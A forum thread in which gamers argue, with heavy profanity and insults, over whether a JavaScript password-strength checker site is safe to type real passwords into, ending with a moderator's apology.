GC_PaNzerFIN
Work and study @ Technical Uni
+528|6384|Finland

Hidden shit really earns my trust for this site

up,up,down,down,left,right,left,right,b,a and highlight the screen
3930K | H100i | RIVF | 16GB DDR3 | GTX 480 | AX750 | 800D | 512GB SSD | 3TB HDD | Xonar DX | W8
Zimmer
Un Moderador
+1,688|6726|Scotland

GC_PaNzerFIN wrote:

Hidden shit really earns my trust for this site

up,up,down,down,left,right,left,right,b,a and highlight the screen
It's a jQuery easter egg. Get over it.
Morpheus
This shit still going?
+508|5969|The Mitten
upupdowndownleftrightleftright
https://static.bf2s.com/files/user/31499/How%20Secure%20Is%20My%20KONAMI.png
EE (hats
mikkel
Member
+383|6571
As a general precaution, I don't enter my passwords anywhere other than the intended fields, but Zimmer is right in this case. There's no code in the source that can establish any connection to transfer anything. Even if the site somehow used an exploit or some form of magic to open a connection, there'd be some sort of actual data transfer involved, but that isn't the case. Nothing is stored anywhere outside of memory, either.

A better reason for why you shouldn't enter your actual passwords on sites like these without thoroughly checking the source code is that they're pretty sweet targets for exploitation. If a system hosting a site is unpatched, or at all vulnerable in some manner, it's a trivial task to replace benign files with replicas suited for less savoury purposes, and that makes any assurance as to the safety of a site obsolete the second they're offered.
killer21
Because f*ck you that's why.
+400|6561|Reisterstown, MD

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
Defiance
Member
+438|6641

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
13urnzz
Banned
+5,830|6467

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
ok mr. everyone-is-paranoid, if you trust this site so much, what is your password?
mtb0minime
minimember
+2,418|6625

Defiance wrote:

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
My password is in the sense that if you put it in a calculator and turn it upside down it says BOOBIES
tazz.
oz.
+1,338|6145|Sydney | ♥

Thank GOD you corrected burnz Zimmer.

Java is a resource heavy hunk of aids.


Javascript however. Oh how I love you

I scanned through his page quickly when i first looked at the site.. It's 100% safe as Zimmer has already stated.

Things to know.

Serverside: Flat, (That is, not generated) files that are downloaded to your browser.

From there, everything is performed client side. When you type in your password, you're simply telling your broswer what to input. The javascript file, which has already been downloaded to your browser is then processed, and shows how secure your password is.

No packets are uploaded once the site is in your browser.

If you want to check, wizz up wireshark.


It shits me when morons come on and start pointing fingers when they have little to no knowledge of any programming language what so ever.

Grow a brain, or get, the fuck off.

Last edited by tazz. (2010-10-19 22:36:28)

everything i write is a ramble and should not be taken seriously.... seriously.
Zimmer
Un Moderador
+1,688|6726|Scotland

Defiance wrote:

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
rdx-fx
...
+955|6562

Zimmer wrote:

You don't seem to understand that there is no "route". That page is static and all that you see there is being rendered by your browser. Absolutely nothing on that page is server side. So however much you like your lovely little theory, it's totally and utterly pointless for this. You aren't submitting anything, nothing is getting parsed by the server, the server isn't taking note of your keystrokes. And no, you cannot "hide" a file into the JS or HTML and hope that nobody sees it whilst it sends data to the server. The fact is that that page could be rendered on your computer, my computer, a server and it wouldn't be able to do anything. There is no server side ANYTHING.

Lovely little theory though, too bad it's total bollocks for the site at hand.

Zimmer wrote:

That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
You and your condescending little attitude don't seem to grasp what I'm getting at.

One, it is not good security policy to throw your passwords at foreign sites. Period.
Two, "assumtion is the mother of all fuckups" and the good illusionist always has you watching the wrong hand.
(i.e., don't get so fixated on the harmless javascript that you ignore the potential from other avenues)
As a moderator and tech team member, I would think you'd see that point first. 

Baffling that you get so defensive, condescending, and downright insulting in defense of a potentially hostile outside website.

My "lovely little theory", as you so derisively put it, is a basic example of a man in the middle attack, put in simplest terms.  Even had a link to more specific details in my post. It was an example of one amongst many ways a hostile site could screw you from behind while showing you harmlessness up front. It was an example of my second point above.

And if you, personally, do not know enough of the relevant code to verify it as harmless, it's good policy to not screw around with sites like the OP.  You, Zimmer, may be able to look at the code and verify it, in this specific instance. Are you sure you didn't miss a vulnerability somewhere else?  While you're looking at the obvious harmless end (javascript), do you know you're not missing a vulnerability somewhere else? Are you sure you want to advise others to play around with such a site?

Looking at it from a security point of view, the site sets off numerous warnings;
Asking for passwords (social engineering 101, ask nicely first),
basic whois query comes back with a very recent registration date,
shows a domain registered for the minimum of 1 year,
and domain is apparently owned by a company that registers domains in bulk (not a sub-registrar).
GC_PaNzerFIN
Work and study @ Technical Uni
+528|6384|Finland

Zimmer wrote:

Defiance wrote:

killer21 wrote:

I can't believe people actually think this site will magically suck up their passwords.  Seems more like paranoia than anything else.  Strange.
When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
Jesus fucking christ, never ever advice people to break even the basic security rules. You call people idiots and yet you are the one advicing people to use sites like this, and use your password where it is not needed. You obviously skipped all network security studies, makes me very worried that someone with JS skills totally ignores key area like security.

There are shitload of potential risks, and ways to get in the middle of even seemingly secure sites. And those are not imaginary, they are very real. But put your head in the bag and throw away your passwords, make up there is no such things as network threats and start calling people idiots if they have even little common sense to question what the fuck others are doing.

Oh and your attitude is pretty damn hostile for moderator, whats up with that?

Last edited by GC_PaNzerFIN (2010-10-20 03:58:28)

3930K | H100i | RIVF | 16GB DDR3 | GTX 480 | AX750 | 800D | 512GB SSD | 3TB HDD | Xonar DX | W8
Winston_Churchill
Bazinga!
+521|6709|Toronto | Canada

Has anyone tried opening the page, disconnecting from the internet and then entering your password.  He said in the FAQ that would work and it would solve this argument pretty quickly...
13urnzz
Banned
+5,830|6467

Zimmer wrote:

If you don't know what you're talking about, keep your mouth shut.
are you going to start censoring people that you don't agree with now? you can take your attitude and fuck off.
killer21
Because f*ck you that's why.
+400|6561|Reisterstown, MD

Defiance wrote:

When it comes to security, erring on the side of caution is better. Besides, what harm does it do to not enter your password in to a simplistic calculator?
Understandable.   
RDMC
Enemy Wheelbarrow Spotted..!!
+736|6535|Area 51

Winston_Churchill wrote:

Has anyone tried opening the page, disconnecting from the internet and then entering your password.  He said in the FAQ that would work and it would solve this argument pretty quickly...
Just tried it. Page stills works.
tazz.
oz.
+1,338|6145|Sydney | ♥

burnzz wrote:

Zimmer wrote:

If you don't know what you're talking about, keep your mouth shut.
are you going to start censoring people that you don't agree with now? you can take your attitude and fuck off.
Zimmer has a valid point.

--

I can understand people not wanting to put in their own passwords, and that's fine.

But when people start going "how stupid are you"

Well, I actually know javascript, i have read the site, so up yours and gtfo. etc
everything i write is a ramble and should not be taken seriously.... seriously.
Peter
Super Awesome Member
+494|6372|dm_maidenhead
For my laptop login:https://i53.tinypic.com/29n72w8.png
lol. i just have it because it takes no time to type it.

3 years for one of my important ones.

Last edited by Peter (2010-10-20 07:25:50)

tazz.
oz.
+1,338|6145|Sydney | ♥

lol.

Shame on you sir
everything i write is a ramble and should not be taken seriously.... seriously.
13urnzz
Banned
+5,830|6467

tazz. wrote:

burnzz wrote:

Zimmer wrote:

If you don't know what you're talking about, keep your mouth shut.
are you going to start censoring people that you don't agree with now? you can take your attitude and fuck off.
Zimmer has a valid point.

--

I can understand people not wanting to put in their own passwords, and that's fine.

But when people start going "how stupid are you"

Well, I actually know javascript, i have read the site, so up yours and gtfo. etc
Tazz, i know very little of javascript. but i work in a mid sized company, and there are practices that protect personal and company property

Defiance wrote:

When it comes to security, erring on the side of caution is better.
this, as IT staff, is what i've tried to get users to understand

Zimmer wrote:

That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password.
as a programmer, Zimmer may be exactly correct, but he's not right. i have to think of ways countless programs and websites can and will impact my employer and my users, so the statement above sucks donkey balls.


GC_PaNzerFIN wrote:

Jesus fucking christ, never ever advice people to break even the basic security rules.
Panzer nailed it. i have nothing to add to that.
tazz.
oz.
+1,338|6145|Sydney | ♥

Why stress certain "rules" towards a site proven to be safe?
everything i write is a ramble and should not be taken seriously.... seriously.
GC_PaNzerFIN
Work and study @ Technical Uni
+528|6384|Finland

tazz. wrote:

Why stress certain "rules" towards a site proven to be safe?
How do you prove it is safe? We are now talking about high interest target site, I know examples of perfectly "safe" sites that have been compromised although the actual owner didn't mean them to be any harm. Even pass all link scanners and be first on google search results, yet be very nasty in terms of security.

There are zero benefits from giving away your password, yet there is potential harm. It is useless to talk about security when ppl throw away all advice starting from most important one everyone should know by now, never tell your password to anyone. I wish one day people would start using their common sense, goes far in terms of security.

Last edited by GC_PaNzerFIN (2010-10-20 07:54:24)

3930K | H100i | RIVF | 16GB DDR3 | GTX 480 | AX750 | 800D | 512GB SSD | 3TB HDD | Xonar DX | W8
tazz.
oz.
+1,338|6145|Sydney | ♥

You can't hack a link that isn't made. Moron.
everything i write is a ramble and should not be taken seriously.... seriously.
Uzique
dasein.
+2,865|6441
i love how tech geeks can get all arrogant and obnoxious when talking about their subject but then if, for example, i do it about literature... im being an elitist faggot. hahaha. the amount of tech egos going around in this thread is astounding... "herp derp im tech team"... "herp derp im a compsci undergrad"... "herp derp im a programmer"... "herp derp i have a subscription to pc gamer magazine"

jesus christ enter in ya passwords or shut the fuck up
libertarian benefit collector - anti-academic super-intellectual. http://mixlr.com/the-little-phrase/
Zimmer
Un Moderador
+1,688|6726|Scotland

rdx-fx wrote:

Zimmer wrote:

You don't seem to understand that there is no "route". That page is static and all that you see there is being rendered by your browser. Absolutely nothing on that page is server side. So however much you like your lovely little theory, it's totally and utterly pointless for this. You aren't submitting anything, nothing is getting parsed by the server, the server isn't taking note of your keystrokes. And no, you cannot "hide" a file into the JS or HTML and hope that nobody sees it whilst it sends data to the server. The fact is that that page could be rendered on your computer, my computer, a server and it wouldn't be able to do anything. There is no server side ANYTHING.

Lovely little theory though, too bad it's total bollocks for the site at hand.

Zimmer wrote:

That's totally understandable. What isn't understandable is when people start making up retarded ways in which that site MAY steal your password. If you don't know what you're talking about, keep your mouth shut. It just makes you look like an utter fool.
You and your condescending little attitude don't seem to grasp what I'm getting at.

One, it is not good security policy to throw your passwords at foreign sites. Period.
Two, "assumtion is the mother of all fuckups" and the good illusionist always has you watching the wrong hand.
(i.e., don't get so fixated on the harmless javascript that you ignore the potential from other avenues)
As a moderator and tech team member, I would think you'd see that point first. 

Baffling that you get so defensive, condescending, and downright insulting in defense of a potentially hostile outside website.

My "lovely little theory", as you so derisively put it, is a basic example of a man in the middle attack, put in simplest terms.  Even had a link to more specific details in my post. It was an example of one amongst many ways a hostile site could screw you from behind while showing you harmlessness up front. It was an example of my second point above.

And if you, personally, do not know enough of the relevant code to verify it as harmless, it's good policy to not screw around with sites like the OP.  You, Zimmer, may be able to look at the code and verify it, in this specific instance. Are you sure you didn't miss a vulnerability somewhere else?  While you're looking at the obvious harmless end (javascript), do you know you're not missing a vulnerability somewhere else? Are you sure you want to advise others to play around with such a site?

Looking at it from a security point of view, the site sets off numerous warnings;
Asking for passwords (social engineering 101, ask nicely first),
basic whois query comes back with a very recent registration date,
shows a domain registered for the minimum of 1 year,
and domain is apparently owned by a company that registers domains in bulk (not a sub-registrar).
My apologies for my first couple of answers, it was stupid of me to jump to such a hostile and condescending stance. I sounded like a prick re-reading them.

I realise all your suggestions and security holes are entirely plausible on any website given certain circumstances... But what I am merely referring to is this website. Of course there are websites that use javascript and the sort to steal passwords, but I'm merely referring to this one.

I also realise that not everyone would know how to check the site is legit, and therefore wont enter their passwords... but I merely just said a couple of pages back that it is 100% safe and nothing can be taken from that site. I said it to the users on this post, because some were having certain concerns about the legitimacy of the site at hand. This was not meant to be directed at a general "if someone says it's safe, then it must be safe" or "all these kind of sites are safe". I was merely advising the users above me that it was safe and I knew it was safe. You choose to disagree with me and start firing theories as to how it is NOT safe? Fine, you do that... but programming isn't a question of Ifs or buts... it's a simple YES or NO answer to your question. I was stating a fact, nothing more.

Am I sure that that site is safe? Yes. Would I bet my life on it? Yes.

I didn't miss any security concerns. I know about all of them and I'm not saying they not question for doubt... all I'm saying is that as the site stands, it cannot be stealing your password. All those security concerns should of course be taken into account if you don't know any Javascript or XHTML and therefore if you have no "trusted" (I put it in inverted commas because clearly my statement of fact wasn't really listened to and I wasn't trusted on it, which is fair enough, but I was still merely stating it was a safe site.) source telling you it's safe, then don't type in your password.

Panzer, this hasn't become about security 101 and the common sense that we should all be applying to the internet. I totally understand that we should all be very cautious about where we put in sensitive data and the sort - this specific post was about that specific site. Lets not branch off from the actual discussion about the site itself. I don't disagree with all your comments about having common sense and not putting in your password in untrusted sites, what I'm saying is that this site is safe. I have not advised anybody to go to other, potentially, harmful sites and start putting in their passwords. I have said that this specific site is fine for doing so.

Yes, there are many ways in which a server can be compromised, and in which you can steal passwords, but this site doesn't employ any of them. Fact. It doesn't because it can't. Nothing is server side and therefore all that is getting displayed is coming directly from your browser. Now, that you have a keylog or a trojan on your computer, that's not the sites fault.

My attitude was awful in the posts above, and for that I do apologise.

At the end of the day, this site is safe, but you shouldn't in principle be putting in your passwords on random and potentially risky sites. Is that a better way of putting it?

Board footer

Privacy Policy - © 2024 Jeff Minard